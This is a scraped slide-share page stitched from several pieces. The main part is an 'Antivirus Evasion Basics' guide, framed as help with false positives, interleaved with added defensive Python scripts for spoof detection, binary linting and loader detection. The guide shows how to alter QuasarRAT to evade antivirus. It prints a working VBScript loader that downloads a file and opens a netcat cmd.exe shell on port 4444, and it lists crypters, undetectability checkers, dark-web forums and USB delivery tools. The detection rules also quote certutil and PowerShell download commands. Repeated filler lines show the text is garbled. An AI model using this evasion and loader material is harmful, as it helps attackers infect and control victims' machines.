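    head, _, tail = name.partition(RLO)
    return head + tail[::-1]


def bidi_controls_in(name: str):
    """(index, 'U+XXXX', Unicode name) for each bidi control character in the string."""
    return [(i, f"U+{ord(c):04X}", unicodedata.name(c))
            for i, c in enumerate(name) if c in BIDI_CONTROLS]


def real_extension(name: str) -> str:
    """Extension the OS will act on, after stripping bidi controls."""
    clean = "".join(c for c in name if c not in BIDI_CONTROLS)
    return clean.rsplit(".", 1)[-1].lower() if "." in clean else ""


def shown_extension(name: str) -> str:
    """Extension the user believes they see."""
    shown = displayed_name(name)
    return shown.rsplit(".", 1)[-1].lower() if "." in shown else ""


def check(name: str) -> dict:
    """Detection verdict for a filename or URL path segment."""
    controls = bidi_controls_in(name)
    return {
        "displayed": displayed_name(name),
        "real_ext": real_extension(name),
        "shown_ext": shown_extension(name),
        "controls": controls,
        "percent_encoded": quote(name),   # how the address bar reveals the trick
        "spoofed": bool(controls) and real_extension(name) != shown_extension(name),
    }


if __name__ == "__main__":
    for n in (spoofed_name("doc", "pdf", "exe"), "song" + RLO + "3pm.exe", "report.pdf"):
        print(check(n))
```

A mail gateway or upload handler can apply check() to every attachment name and reject anything whose verdict is spoofed; rejecting on the mere presence of a bidi control is usually acceptable too, since legitimate filenames almost never need one.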
Conclusion
Attackers use every trick in the book to disguise their malicious files. Read more about phishing techniques and ways to protect yourself. These tricks are very easy to implement and effective. We should be vigilant about every URL or file that we download or open. As they say, the devil is in the details.
BE SAFE, BE SECURE!!
References:
https://www.ipa.go.jp/security/english/virus/press/201110/E_PR201110.html
https://krebsonsecurity.com/2011/09/right-to-left-override-aids-email-attacks/
Antivirus Evasion Basics
Basic information
In this article we are going to talk about how antivirus protection is evaded, and about how hard the same detection logic makes life for developers who create legitimate software. I strongly recommend that you use this information for white-hat purposes only; otherwise you can get into trouble. We will cover the things that help a developer avoid false positives on their software. Everybody facing this problem should know the basic concepts and tools that can help handle it.
Bohdan Ethics
Ethical hacker with 12 years of experience. Worked at the CQR company in Ukraine. Geek, IT security addict. His nickname is VULNZ.
False positive EXE.cuted. False positive problems on legitimate software
This research is made for developers who face false positive results on their software.
Signature detection
Many antiviruses are designed to function analogously to the human immune system. They scan the computer for signatures corresponding to known binary "pathogens". The antivirus refers to a dictionary of known viruses, and if any part of a file matches a pattern in the dictionary, the antivirus neutralizes it. As with the immune system, the dictionary needs updates, like flu shots, to provide adequate protection against emerging strains. Any antivirus counteracts what it deems harmful. The problem is that new strains appear at a rate the antivirus developers may not keep pace with. The computer is therefore vulnerable during the window between the time a virus is first seen and the time the dictionary update is released by the vendor, which is why the antivirus should be kept as up to date as possible.
Scan engine methods
The core of an antivirus is its scan engine. The engine scans data and, when a virus is detected, disinfects it. Below are the main ways of scanning.
Main basic techniques
Size: the antivirus can easily detect that a file has changed or been infected. It is common for some viruses to append their malicious code at the end of the file. An antivirus scans the file and compares its size before and after. If the user made no changes, the antivirus suspects malicious activity on the computer.
Pattern matching: each known virus has a distinct signature, a byte sequence extracted from it by the vendor, which may be as little as a few instructions of its infection routine. The antivirus compares file contents with the stored signatures, and a match is a clear indication of an infection.
Heuristics: a heuristic scan judges whether the data being scanned is dangerous without a known signature. The technique analyzes what the code does and compares it against a list of hazardous actions. For instance, if the antivirus detects that a program is attempting to open every EXE file and infect it by writing a replica of itself into it, the antivirus declares the activity dangerous and sounds an alarm. The decision then remains with the user whether to eliminate the suspected virus or not.
The above methods have merits and demerits. If the antivirus uses the signature approach, it needs regular updates. Since new samples appear every day, this should be done on a daily basis; an antivirus left un-updated for many days is a severe risk.
Other ways the antivirus works include monitoring incoming files and deleting any virus within them, placing suspect files in quarantine, and updating the software itself so that it addresses emerging infections. The software may be set to check for updates at regular intervals.
False positives
A false positive is the incorrect identification of a harmless program as a virus. It is regarded as a demerit of the identification method: small weaknesses in any detection method may result in false positives, which can be as damaging as false negatives.
Ideally the false positive rate is zero or very close to zero. Any rise in the false positive rate is undesirable.
Note: The chart gives a good picture of what percentage of false positives occur. These statistics are outdated, but the idea is clearly seen.
• Reasons for getting false positives
Signature-based procedures give very precise scanning by tying each detection to a specific virus and its signature. The drawback of this method is that it cannot detect new and unknown viruses. Generic methods can identify all kinds of viruses without using signatures, but they have their own drawback: they create false positives.
For instance, heuristics can detect new and unknown viruses but are prone to false positives, because heuristics rely on probabilistic methods and are never certain of an infection.
For example, if a heuristic scanner sees a file "open" call followed by "read" and "write" calls, and also finds the string "Virus" in the program, it may conclude that the file is being attacked by an unidentified virus.
A file that is not infected at all may still meet all the conditions that the heuristic associates with infection; this is what produces false positives.
As mentioned, generic methods are the most susceptible to false positives.
False positives result from the difficulty of telling good code from bad. A wrong decision produces either a false positive or a false negative. The antivirus looks only for signatures of viruses, not for the whole virus program, and it also uses wildcard signatures. The byte patterns it finds are not necessarily unique to virus code.
Since conventional signatures are useless against polymorphic and metamorphic malware, modern antiviruses have to incorporate heuristic approaches to deal with such viruses. Such methods often come with high rates of false positives.
• Solutions
1. All software should carry the basic information of a binary file: description, version, product name, language, company name. Many false positives occur because the file has no such information inside, so it is flagged as suspicious or unwanted.
2. Check whether the file was flagged as a virus based on its MD5 hash. It is an uncommon situation, but it can happen accidentally; an example is shown below.
3. Pack the exe to make it harder to unpack. A custom packer might seem to be the answer, but it is better to pack with the standard UPX, because a custom packer creates new problems for antiviruses that cannot identify which packer was used.
Antivirus programs trust commonly used packers and dislike custom packers and some kinds of "anti-antivirus" packers.
4. Avoid hooks, and avoid writing to or reading from the registry if you do not need it. Registry accesses that look suspicious and should be avoided include those related to: antivirus software, firewall, remote administration, keyboard layout, file-extension handling, enabling/disabling updates, and reading/editing the system event log.
5. Avoid using system files and services that deal with remote administration or connections if you are not developing network software.
Calling built-in programs like ftp, telnet, psexec, rdp or similar from inside your binary can cause a false positive, because a lot of malicious software uses the built-in ftp client, for example, to steal and transfer data over the internet. It is better to use the system APIs than to drive such programs.
6. It is a good idea to build an MSI package for installing and uninstalling the software. An example of creating MSI packages is shown below. It was also observed that antivirus programs trust MSI files more, because they are mostly used for legitimate purposes, and they pass behavioral analysis better.
Example of a terminal utility packing an exe with UPX.
7. Give users the ability to check right away whether the compiled binary is flagged as malware in the VirusTotal database, and advise them accordingly.
8. If the developer wants to prevent reverse engineering of the code, anti-VirtualBox/sandbox and virtual environment detection can be enabled; note that this can itself raise suspicion.
9. Discourage the community from building malicious software on top of your tool. Talk to the community and do weekly research on GitHub and other websites to see whether someone has created malware with it, because that makes antivirus companies look deeper and may produce more false positives for everyone. This happened to the Develstudio project, a tool for creating GUIs or binaries from PHP code: based on our research, the project almost closed and lost a large number of followers because it was used for creating malware rather than clean php2exe projects. The algorithm can be as simple as this: find all similar projects on GitHub, download them to the cloud and check all releases (binaries) for viruses; to make it more thorough, compile them and check. This is not hard if the community is not big. Wrappers around the common scanners make this easier than checking on VirusTotal alone.
10. Better not to use the names of Windows core files: some antiviruses were found to react to common names like "svhost.exe", "system32.exe", etc.
11. Better not to use the names of commonly used software like "firefox.exe", "chrome.exe", etc. It was observed that 3-5% of antiviruses react to such names by re-checking the MD5 of the real product and its versions against the binary.
12. One of the most important steps in software distribution is approval: it was observed that any binary that is neither signed nor flagged on the antivirus vendor's servers as commonly used will be blocked by the browser or by Windows SmartScreen.
Signing can be automated with a batch file; a code-signing certificate and a signing utility can be bought from a commercial vendor.
13. Do not put multiple exe files inside one. This activity is typical of a Trojan horse, so understand that archiving one binary inside another, for whatever reason, can cause problems.
Note: This is an example of an exe joiner that was marked as malicious without actually being so, only because it is commonly used to glue malicious software together, so its algorithm is marked as malicious too.
14. Some binaries were found to contain long runs of consecutive zero bytes. To an antivirus this looks like problematic software that deliberately creates unused areas in memory or on disk in order to bypass MD5 checks, behavioral analysis or signature-based analysis, so it is important to produce code in which no runs of zeros show up in a hex editor.
15. It is a good idea to let users read terms and conditions before they install or run the software. There is no confirmed information that antiviruses check for the existence of terms and conditions.
16. A custom icon is one of the reasons a binary may not be detected as malicious. As explained earlier, machine learning techniques carry a notion of "what malware looks like", and most malware has no icon of its own, because the developer either steals one, which is detected by antiviruses as well, or leaves the default.
17. Do not use special characters, large amounts of white space or many dots in the file name. It was checked many times with different antiviruses that, as a defence against extension spoofing, names that violate certain rules are blocked and marked as malicious. This is easy to verify by creating a clean exe with a spoofed name.
Here is the software.
18. Files that download other files or source from the internet and run them look like a problem to some antiviruses, since they cannot control all the processes involved, so the action appears suspicious.
19. Files that download and run libraries can be flagged as dangerous, because machine learning has seen some .dll files used in the mass production of malicious software, and you may be the one accidentally using one of them. It is always better to use the OS's built-in components.
20. Try not to inject into a running process because, as mentioned before, many antivirus solutions see hooks and injectors and mark them suspicious even if they do no harm.
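Several items in the list above can be checked before a release without any antivirus at all. The following Python script is an added example for this edition, not a tool from the article or its author: it applies items 1, 5, 10, 11, 13, 14 and 17 to a binary (version-info resource present, no remote-administration tool strings, no reserved or look-alike name, no second embedded executable, no long zero runs, no odd characters in the file name). The PE parsing is deliberately minimal (only the DOS header and e_lfanew are read), and the thresholds, string lists and the constructed fake PE used as sample input are assumptions to tune per product.

```python
"""Added example, not from the article: a pre-release lint that applies several items of the
checklist above to a Windows binary. PE parsing is minimal (DOS header + e_lfanew only);
thresholds, string lists and the constructed sample binary are assumptions."""
import re
import struct
from typing import Dict, List

# Item 10/11: names that collide with Windows core files or popular software (assumed list).
RESERVED_NAMES = {"svchost.exe", "svhost.exe", "system32.exe", "firefox.exe",
                  "chrome.exe", "explorer.exe"}
# Item 5: built-in remote-admin/transfer tools that malware commonly drives (assumed list).
REMOTE_ADMIN_STRINGS = [b"ftp.exe", b"telnet", b"psexec", b"mstsc", b"tftp"]
# Item 14: longest run of 0x00 bytes tolerated; section alignment padding is normally smaller.
ZERO_RUN_LIMIT = 4096


def pe_headers(blob: bytes) -> List[int]:
    """Offsets of every embedded PE image: an 'MZ' whose e_lfanew points at 'PE\\0\\0'."""
    found = []
    for m in re.finditer(b"MZ", blob):
        off = m.start()
        if off + 0x40 > len(blob):
            continue
        e_lfanew = struct.unpack_from("<I", blob, off + 0x3C)[0]
        if blob[off + e_lfanew: off + e_lfanew + 4] == b"PE\x00\x00":
            found.append(off)
    return found


def longest_zero_run(blob: bytes) -> int:
    """Length of the longest run of consecutive zero bytes (item 14)."""
    return max((len(m.group()) for m in re.finditer(b"\x00+", blob)), default=0)


def has_version_info(blob: bytes) -> bool:
    """Item 1: the VS_VERSIONINFO resource carries its key as a UTF-16LE string."""
    return "VS_VERSION_INFO".encode("utf-16-le") in blob


def lint(filename: str, blob: bytes) -> Dict[str, str]:
    """Return {check: reason} for every checklist item the binary violates."""
    findings: Dict[str, str] = {}
    base = filename.rsplit("/", 1)[-1]
    if base.lower() in RESERVED_NAMES:
        findings["name"] = f"{base} collides with a Windows/common-software binary name"
    if re.search(r"\s{2,}|\.{2,}|[^\x20-\x7e]", base):          # item 17
        findings["name_chars"] = "runs of spaces/dots or non-printable characters in file name"
    images = pe_headers(blob)
    if not images:
        findings["format"] = "no valid PE header found"
    elif len(images) > 1:                                        # item 13
        findings["embedded_exe"] = f"{len(images)} PE images found; second at offset {images[1]}"
    if not has_version_info(blob):
        findings["version_info"] = "no VS_VERSION_INFO resource (description/company/version)"
    run = longest_zero_run(blob)
    if run > ZERO_RUN_LIMIT:
        findings["zero_run"] = f"{run} consecutive zero bytes"
    hits = [s.decode() for s in REMOTE_ADMIN_STRINGS if s in blob.lower()]
    if hits:
        findings["remote_admin"] = "references remote-admin tools: " + ", ".join(hits)
    return findings


def fake_pe(version_info: bool = True, extra: bytes = b"") -> bytes:
    """Constructed stand-in for a PE file: DOS header with e_lfanew -> 'PE\\0\\0', then payload."""
    e_lfanew = 0x80
    dos = (b"MZ" + b"\x90" * (0x3C - 2) + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\x00")
    body = b"PE\x00\x00" + b"\xcc" * 64
    if version_info:
        body += "VS_VERSION_INFO".encode("utf-16-le")
    return dos + body + extra


if __name__ == "__main__":
    print("clean:", lint("mytool.exe", fake_pe()))
    dirty = fake_pe(version_info=False,
                    extra=b"\x00" * 5000 + b"PsExec" + fake_pe(version_info=False))
    for check, reason in lint("svhost.exe", dirty).items():
        print(f"{check}: {reason}")
```

Run it on the real release artifact as a CI step and fail the build on any finding; a genuine PE parser (for example the pefile module) would let you also verify that the version-info strings are populated rather than merely present, and that the binary carries a valid Authenticode signature (item 12).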
Signature creation process:
There is a good article that explains everything about creating signatures for viruses for ClamAV. We read it and based some of the additional information above on it.
Solving the problem:
Software could be developed that detects which compiler produced a binary and helps it pass all these checks step by step, or this could be integrated into the compiler (not sure this is a good idea given the size increase). All the steps can be found above.
The idea is to make life easier for developers who want to distribute their software but constantly face problems with false positives. This can be a separate product, or it can be shipped as "tools" that help the developer with this issue.
Note: Example of what an exe maker/wrapper that helps avoid false positives can look like.
To summarize, here is what antivirus engineers answer when asked why false positives occur on their solutions:
Ryan Permeh, Cylance:
"The Cylance engine is not an antivirus engine. Unlike AV, it doesn’t have a bias toward letting everything run.
The technology doesn't assume a file is good until it’s evaluated. Our approach is to measure and decide on
each and every file individually, and if it doesn't fit into our model of good, it leans towards bad. Without a bunch
of data to base a decision on, and without any real patterns of goodness to identify it as such, the engine leaned
heavily on the structural bits that are odd and drew a line towards bad in this case. When we train models, we
train on hundreds of millions of good and hundreds of millions of bad files (samples). We look at several million
potential data points (features) in each file in general, a piece of code can become "bad" by doing things that
lean towards bad. But it can also lean towards bad by not doing things that lean towards good. So in the most
basic example provided (hello world in debug build). The sample was small. It didn't show any bad, but it didn't
show any good either; One function programs are almost always malware; Debug builds are statistically weird;
Using mingw rather than visual studio is statistically weird. The output binary is 'odd.'"
Hyrum Anderson, Endgame:
"Before Twitter caught ablaze with these “hello world” samples, our own internal research indicated that our and
other models were susceptible to these toy samples. Let’s explain why. Endgame’s machine learning malware
detection uses static features to determine before a customer executes a file whether it is likely malicious or
benign. The machine learning model is an imperfect summarization of tens of millions of malicious and benign
software on which the model was trained. As an imperfect model, it can obviously be wrong, but still extremely
useful in detecting never before seen malware, far more useful than approaches which rely on signatures for
already known malware families. For the case of our model and other machine learning models based on static
features, the model can be wrong in this case because, in the training dataset, the model has seen: lots of real
malware samples that are small unsigned binaries; lots of real malware samples where the entry point (.text)
section is small, like droppers unpacking stubs; lots of real malware samples that attempt to hide their imports
from static analysis by some method, so that their import table looks very small. On the contrary, there are very
few “useful” benign files that are small, certainly too few to contradict the above experience. It’s important to
note that machine learning is actually quite good for prevention and detection malware, both novel samples and
the more well known. Endgame was one of the only few to get NotPetya in VirusTotal, for example. That said, all
machine learning models have blind spots (false negatives) and they can mistakenly call things bad (false
positives). In fact, we’ve shown in our published research that for some machine learning models, these
vulnerabilities can be quite convenient to exploit... At Endgame, we employ a strategy of layered protections
that align with a large number of commonly seen attacker actions. Our MalwareScore engine (released
standalone in VirusTotal) represents only a single slice of that layered protection paradigm. The layers work in
concert to alert our customers of potential threats (reducing FNs), and working together to build a complete
story of a potential threat (reducing FPs). Fortunately, the samples highlighted on Twitter are interesting corner
cases, but are extremely esoteric for our customer base. Nevertheless, we continually are doing more research
to improve our detection ratio and reduce our false positive rate. This involves data gathering to increase our
model’s understanding of the universe of benign and malicious software as well as a huge amount of
experimentation effort to maximize our model’s performance. We put a great amount of attention on addressing
known false positives seen by our customers. As a result of these efforts, we regularly release models to our
customers and to VirusTotal. And, we continue to work with 3rd parties to validate our model’s performance on
real files.”
Dr. Sven Krasser, CrowdStrike:
"There are two important aspects to understand. First, the machine learning models for static file analysis we
use at CrowdStrike are optimized to detect malware, especially novel families that bypass signature-based
approaches, while avoiding interference with legitimate business applications. However, unusual and artificially
constructed files fitting into neither of these two categories are occasionally detected as well. For this reason,
we expose confidence values and allow customers to set their own thresholds. While in this instance our file
analysis engine was arguably too aggressive, generally this behavior is by design: if a file does not look like a
legitimately useful application while also exposing unusual traits, then the sound call is to prevent it from
executing. Avoiding odd looking yet potentially benign objects should be a familiar concept should you have
ever opened an office fridge before. Second, static file analysis alone (i.e. what most vendors provide on
VirusTotal) is simply not a sufficient security tool on its own. It is easy to create files that behave benignly yet are
detected by both signature and ML-based engines. It is, however, also possible to create malware files that
bypass detection. That is trivially possible for signature-based engines, but one can also bypass ML-based
static file analysis with some effort. Therefore, CrowdStrike Falcon uses static file analysis as only one of many
techniques to detect threats while combining it with several other layers of defense, such as advanced
Indicators of Attack."
Compilation from source
Taking Quasar as an example, you can take Visual Studio 2017 and build it from source.
Before building, you can change the code itself:
1) Add commands or variables that do not affect the process
2) Add additional functions that do something
3) Delay the execution of something
4) Rename the variables throughout the project
5) Obfuscate the code
6) Remove fingerprints (name of shpz, author name)
https://github.com/quasar/QuasarRAT
To find out which part of the code the antivirus complains about, cut the binary into pieces (for example, head -c 1000 1.exe > part.exe, then with larger and larger sizes), copy each piece to the host machine running the antivirus, and note the size at which the detection first fires.
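The manual "head" procedure above can be turned into a binary search. The following Python script is an added example for this edition (not a tool from the article): it finds the smallest prefix of a file that still triggers a scanner, then shrinks the window from the left to isolate the bytes the signature matches, and finally prints those bytes as a ClamAV .ndb body signature of the kind the "Signature creation process" section refers to. The scanner here is a constructed stand-in, a callback that says whether a blob is detected; against a real engine you would replace it with something that writes the slice to disk and runs, for example, clamscan on it. The pattern, sample bytes and function names are assumptions.

```python
"""Added example (not from the article): locate which bytes of a binary a scanner's signature
matches by testing truncations (the 'head -c N' approach) with a binary search, then express
the offending bytes as a ClamAV .ndb signature. The scanner is a constructed stand-in."""
from typing import Callable, Optional, Tuple

Scanner = Callable[[bytes], bool]   # True when the scanner flags the blob


def first_detected_length(blob: bytes, scan: Scanner) -> Optional[int]:
    """Smallest N such that scan(blob[:N]) is True; None if the whole file is clean.
    Assumes detection is monotone in the prefix, which holds for static byte signatures."""
    if not scan(blob):
        return None
    lo, hi = 0, len(blob)            # invariant: scan(blob[:lo]) False, scan(blob[:hi]) True
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if scan(blob[:mid]):
            hi = mid
        else:
            lo = mid
    return hi


def signature_span(blob: bytes, scan: Scanner) -> Optional[Tuple[int, int]]:
    """(start, end) of the bytes the signature needs: end from the prefix search, start by
    shrinking the window from the left until detection stops."""
    end = first_detected_length(blob, scan)
    if end is None:
        return None
    lo, hi = 0, end                  # invariant: scan(blob[lo:end]) True, scan(blob[hi:end]) False
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if scan(blob[mid:end]):
            lo = mid
        else:
            hi = mid
    return lo, end


def clamav_ndb(name: str, sig: bytes, target_type: int = 0, offset: str = "*") -> str:
    """One line in ClamAV .ndb format: MalwareName:TargetType:Offset:HexSignature
    (target type 0 = any file, offset * = anywhere)."""
    return f"{name}:{target_type}:{offset}:{sig.hex()}"


# Constructed sample: a 'binary' with a known bad pattern in the middle, and a scanner that
# behaves like a signature engine looking for exactly that pattern.
PATTERN = b"\x55\x8b\xec\x83\xec\x10EVIL"
SAMPLE = b"\x90" * 300 + PATTERN + b"\xcc" * 200


def demo_scan(blob: bytes) -> bool:
    return PATTERN in blob


if __name__ == "__main__":
    span = signature_span(SAMPLE, demo_scan)
    print("first detected prefix length:", first_detected_length(SAMPLE, demo_scan))
    print("signature span:", span)
    if span:
        print(clamav_ndb("Example.Sig", SAMPLE[span[0]:span[1]]))
```

Two caveats for real engines: truncating a PE also corrupts its headers, so some scanners refuse the file rather than scan it (cutting sections instead of raw prefixes avoids that), and heuristic or machine-learning engines are not monotone in the prefix, so the search only makes sense for static byte signatures. If the engine has more than one signature for the file, mask the span you found and run the search again.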
Hex editor
https://mh-nexus.de/en/hxd/
https://www.x-ways.net/winhex/
https://www.wxhexeditor.org/
Debuggers
https://www.immunityinc.com/products/canvas/debugger
https://samsclass.info/127/proj/p8aim.htm article
https://exelab.ru/download.php?action=list&n=MTA=
Signature certificate
http://qaru.site/questions/54786/signing-a-windows-exe-file (guide: signing on Windows the standard way)
https://www.connect-trojan.net/2016/06/aegis-crypter-8.5.html (Aegis crypter has this function)
Installers and SFX:
https://www.advancedinstaller.com/
https://www.actualinstaller.com/
http://www.cyberforum.ru/cmd-bat/thread2022256.html (SFX archive)
Packers
UPX, ASPack, FSG, PeShield, VMProtect
https://github.com/EgeBalci/Amber
https://github.com/Eronana/packer
http://www.webtoolmaster.com/packer.htm
https://www.boxedapp.com/
https://github.com/SerGreen/Appacker Very interesting packer, it can pack the entire folder
Protectors and anti-debugging
https://github.com/bekdepo/cryptor (you need to compile it)
https://github.com/Paskowsky/DreamProtectorFree (GUI)
https://exelab.ru/download.php?action=list&n=NDA= (collection of protectors, still relevant)
Cryptors
https://github.com/Ch0pin/AVIator (compiled binaries: https://github.com/Ch0pin/AVIator/tree/master/Compiled%20Binaries)
https://github.com/NYAN-x-CAT/Lime-Crypter
https://github.com/extremecoders-re/xor-files (XOR)
https://github.com/malwares/Crypter (a huge list, to compile)
https://github.com/guilhermej/scantime_py_crypter (easy to understand, you can change the key)
Stub generators
https://www.youtube.com/watch?v=_Qx3UZAuo8o
https://www.mediafire.com/file/pazaz4pzwk27eow/%5BVIP%5DCrypter+v2f%2BUnique+Stub+Generator
+0.5.1+%5BFUD%5D%5BApril+2014%5D.rar
Loader / Dropper
A loader (downloader) is a small stage that by itself does not affect the system in any way; it stays on the system for a specified time and, once it has finished downloading the payload, is usually no longer used. A loader can be a vbs, js, hta, bat, ps1 or other file. Windows also ships with built-in software such as FTP, START (bat), PowerShell scripts and certutil that can be used to download malware.
• Article on this subject:
https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av/
• Example of a loader in VBScript (downloads a binary and runs it; the quirks of the original listing, such as a stray space in the netcat flag, are corrected here):
Dim http_obj
Dim stream_obj
Dim shell_obj
Set http_obj = CreateObject("Microsoft.XMLHTTP")
Set stream_obj = CreateObject("ADODB.Stream")
Set shell_obj = CreateObject("WScript.Shell")
URL = "http://www.mikemurr.com/example.exe"    ' Where to download the file from
FILENAME = "nc.exe"                             ' Name to save the file as (on the local system)
RUNCMD = "nc.exe -L -p 4444 -e cmd.exe"         ' Command to run after downloading
http_obj.open "GET", URL, False
http_obj.send
stream_obj.type = 1                             ' adTypeBinary
stream_obj.open
stream_obj.write http_obj.responseBody
stream_obj.savetofile FILENAME, 2               ' adSaveCreateOverWrite
shell_obj.run RUNCMD
https://github.com/d4rkcat/cryptbinder
https://github.com/93aef0ce4dd141ece6f5/File-Binder Simple and generates a stub
https://github.com/NAWAK01/WinRAT classic dropper on command
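As an added example, not taken from the article or from any of the tools it links, the following Python encodes the loader primitives described above (certutil, FTP scripts, PowerShell, and vbs/js/hta files run by a script host, plus the object chain of the VBS loader) as detection rules and runs them over constructed process-creation events and script bodies; the rule names, the event layout and every sample value are assumptions.

```python
"""Detection rules for the loader/dropper primitives named in the article: certutil,
FTP scripts, PowerShell, and vbs/js/hta files launched through a script host.
Added example; the event layout and every sample value below are constructed."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    rule: str       # name of the rule that fired
    evidence: str   # the command line that triggered it


# Command-line rules, matched case-insensitively. Matching only the binary name would
# bury defenders in benign certutil/ftp/powershell use, so every rule also requires a
# download-shaped argument (a URL, a script file, or a known download cmdlet/method).
CMDLINE_RULES = {
    "certutil_download": re.compile(
        r"\bcertutil(?:\.exe)?\b.*-(?:urlcache|verifyctl)\b.*https?://", re.I),
    "script_host_loader": re.compile(
        r"\b(?:wscript|cscript)(?:\.exe)?\b.*\.(?:vbs|vbe|js|jse|wsf)\b", re.I),
    "ftp_scripted_session": re.compile(r"\bftp(?:\.exe)?\b.*-s:", re.I),
    "powershell_download": re.compile(
        r"\bpowershell(?:\.exe)?\b.*(?:downloadfile|downloadstring|invoke-webrequest)",
        re.I),
    "mshta_loader": re.compile(r"\bmshta(?:\.exe)?\b.*(?:\.hta\b|https?://)", re.I),
}

# Script-body indicators: the article's VBS loader chains exactly these objects
# (HTTP fetch -> ADODB.Stream SaveToFile -> WScript.Shell Run). Any one of them is
# common in admin scripts; three or more together is the loader shape.
SCRIPT_INDICATORS = {
    "http_client": re.compile(
        r"Microsoft\.XMLHTTP|MSXML2\.(?:Server)?XMLHTTP|WinHttp\.WinHttpRequest", re.I),
    "binary_stream": re.compile(r"ADODB\.Stream", re.I),
    "write_to_disk": re.compile(r"\.savetofile\b", re.I),
    "shell_execute": re.compile(r"WScript\.Shell", re.I),
}
SCRIPT_THRESHOLD = 3


def scan_cmdline(cmdline: str) -> list[str]:
    """Return the names of every command-line rule that matches."""
    return [name for name, rx in CMDLINE_RULES.items() if rx.search(cmdline)]


def scan_script(text: str) -> list[str]:
    """Return the names of every script-body indicator present in the text."""
    return [name for name, rx in SCRIPT_INDICATORS.items() if rx.search(text)]


def is_loader_script(text: str) -> bool:
    """True when the script shows the fetch-write-run combination of a loader."""
    return len(scan_script(text)) >= SCRIPT_THRESHOLD


def scan_events(events: list[dict]) -> list[Finding]:
    """Run the command-line rules over process-creation events ({'id', 'cmdline'})."""
    findings = []
    for event in events:
        for rule in scan_cmdline(event["cmdline"]):
            findings.append(Finding(rule, event["cmdline"]))
    return findings


# Constructed process-creation events (command line only; a real feed would also carry
# parent image, user and hashes). example.invalid is a reserved, non-resolving name.
CONSTRUCTED_EVENTS = [
    {"id": 1, "cmdline": r"certutil.exe -urlcache -split -f http://example.invalid/p.bin C:\Users\Public\p.bin"},
    {"id": 2, "cmdline": r"certutil.exe -hashfile C:\tools\app.exe SHA256"},  # benign use
    {"id": 3, "cmdline": r"wscript.exe //B C:\Users\Public\invoice.vbs"},
    {"id": 4, "cmdline": r"ftp.exe -s:C:\Users\Public\ftp.txt"},
    {"id": 5, "cmdline": "powershell.exe -w hidden -c \"Invoke-WebRequest http://example.invalid/a.exe -OutFile C:\\Users\\Public\\a.exe\""},
    {"id": 6, "cmdline": r"notepad.exe C:\Users\alice\notes.txt"},  # benign
    {"id": 7, "cmdline": r"mshta.exe http://example.invalid/x.hta"},
]

# Constructed script bodies: the first has the object chain of the article's VBS loader,
# the second is an ordinary logon script that only maps a drive through WScript.Shell.
CONSTRUCTED_LOADER_VBS = """\
Set http_obj = CreateObject("Microsoft.XMLHTTP")
Set stream_obj = CreateObject("ADODB.Stream")
Set shell_obj = CreateObject("WScript.Shell")
' ... request sent and response written into stream_obj ...
stream_obj.SaveToFile FILENAME, 2
shell_obj.Run RUNCMD
"""
CONSTRUCTED_LOGON_VBS = """\
Set shell_obj = CreateObject("WScript.Shell")
shell_obj.Run "net use H: \\\\fs01\\home"
"""

if __name__ == "__main__":
    for finding in scan_events(CONSTRUCTED_EVENTS):
        print(f"[{finding.rule}] {finding.evidence}")
    print("loader script:", is_loader_script(CONSTRUCTED_LOADER_VBS))  # True
    print("logon script :", is_loader_script(CONSTRUCTED_LOGON_VBS))   # False
```

The benign certutil hash check and the drive-mapping logon script pass untouched, which is the point of requiring a download-shaped argument or three co-occurring objects rather than the binary or object name alone.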
Spoofers and pumpers:
https://github.com/henriksb/ExtensionSpoofer
https://github.com/AHXR/maskedkitty
https://mega.nz/#!NxZACbJA!me-l4SBMoMkAGqbg1rwIVBLINeNvudC21NEBuskrsxU
Glue / Joiner
Joiner by Blade, SuperGlue, MicroJoiner, Juntador
https://github.com/danielhnmoreno/pyJoiner
https://www.exejoiner.com/
Delivery
Online
Formats: Doc, Docx, Rtf.
Options: Social engineering, exploits in versions of
Obfuscation is often used when delivering documents.
Offline
Options: Social Engineering, Equipment Capture, Access
Rubber Ducky
https://github.com/SkiddieTech/UAC-DE-Rubber-Ducky
https://github.com/hak5darren/USB-Rubber-Ducky
Digispark
https://github.com/CedArctic/DigiSpark-Scripts
Ninja cable
https://usbninja.com/
In offline delivery, you can and should use spoofers.
What a cryptor should contain to keep the protected file safe from analysis:
Anti Ring3 Hooks, Anti Emulator, Anti Debugger, Anti Dumper, Anti VM / SandBox
Be aware that these same anti-analysis features can themselves trigger antivirus detections on the protected file; you should understand this trade-off too.
• Paid services
https://theoldphantom.net/
https://spartanproducts.net/
http://staticsoftwares.pro/
• People
https://bhf.io/threads/534014/
https://lolzteam.org/threads/964713/
https://darkwebs.cc/threads/95571/
https://darkwebs.cc/threads/74946/
https://lolzteam.org/threads/314158/
• Free services
http://virtualcrypt.xyz/
https://www.crypter.com/download.html
• Crypto Forums
http://shanghaiblackgoons.com/crypters/
http://www.blackhatrussia.com/crypters/
https://zhacker.net/crypter/
https://ifud.ws/forums/kriptory-jojnery.2/
• Where to check FUD (fully undetectable) status
https://nodistribute.com
https://antiscan.me/
https://run4me.net/
Additionally
Information on what things affect detections from md5 to behavior and icons.
https://github.com/vulnz/false-positive-executed
https://ifud.ws/threads/exel-b-kurs-videourokov-krehkerstvo-programmirovanie-2017-pcrec.13022/ Exelab courses + software
54
Antivirus Evasion Basics
Pt08 19 final1
Pt08 19 final1
Pt08 19 final1
Pt08 19 final1
Pt08 19 final1
Pt08 19 final1
Pt08 19 final1
Pt08 19 final1
Pt08 19 final1
Pt08 19 final1
Pt08 19 final1
Pt08 19 final1
Pt08 19 final1
Pt08 19 final1
Pt08 19 final1
Pt08 19 final1
Pt08 19 final1
Pt08 19 final1
Pt08 19 final1
Pt08 19 final1
Pt08 19 final1
Pt08 19 final1

Más contenido relacionado

La actualidad más candente

Hacktive Security - Ethical Hacking Services
Hacktive Security - Ethical Hacking ServicesHacktive Security - Ethical Hacking Services
Hacktive Security - Ethical Hacking Services
Carlo Pelliccioni, CISSP
 
Layer8 exploitation: Lock'n Load Target
Layer8 exploitation: Lock'n Load TargetLayer8 exploitation: Lock'n Load Target
Layer8 exploitation: Lock'n Load Target
Prathan Phongthiproek
 

La actualidad más candente (19)

Hacking3e ppt ch06
Hacking3e ppt ch06Hacking3e ppt ch06
Hacking3e ppt ch06
 
